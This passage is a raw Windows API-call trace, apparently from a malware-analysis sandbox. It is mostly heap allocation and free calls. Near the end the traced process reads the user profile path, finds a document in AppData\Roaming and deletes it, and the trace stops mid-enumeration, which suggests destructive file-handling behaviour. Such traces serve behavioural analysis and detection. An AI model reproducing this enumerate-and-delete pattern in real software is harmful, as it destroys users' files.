hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.600] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.600] CloseHandle (hObject=0x294) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0198.601] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0198.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0198.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.603] CloseHandle (hObject=0x268) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0198.607] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.612] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0198.612] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0198.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.613] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f1fe0 [0198.614] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/fieUnO JbD.odp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fieUnO JbD.odp", lpFilePart=0x8bedfc*="fieUnO JbD.odp") returned 0x3c [0198.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0198.614] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fieUnO JbD.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fieuno jbd.odp")) returned 0x2020 [0198.614] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fieUnO JbD.odp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacb8550, ftCreationTime.dwHighDateTime=0x1d4c923, ftLastAccessTime.dwLowDateTime=0x29904190, ftLastAccessTime.dwHighDateTime=0x1d4cfbf, ftLastWriteTime.dwLowDateTime=0x29904190, ftLastWriteTime.dwHighDateTime=0x1d4cfbf, nFileSizeHigh=0x0, nFileSizeLow=0x182dd, dwReserved0=0xa68, dwReserved1=0x4, cFileName="fieUnO JbD.odp", cAlternateFileName="FIEUNO~1.ODP")) returned 0xaa5660 [0198.614] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fieUnO JbD.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fieuno jbd.odp")) returned 1 [0198.616] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacb8550, ftCreationTime.dwHighDateTime=0x1d4c923, ftLastAccessTime.dwLowDateTime=0x29904190, ftLastAccessTime.dwHighDateTime=0x1d4cfbf, 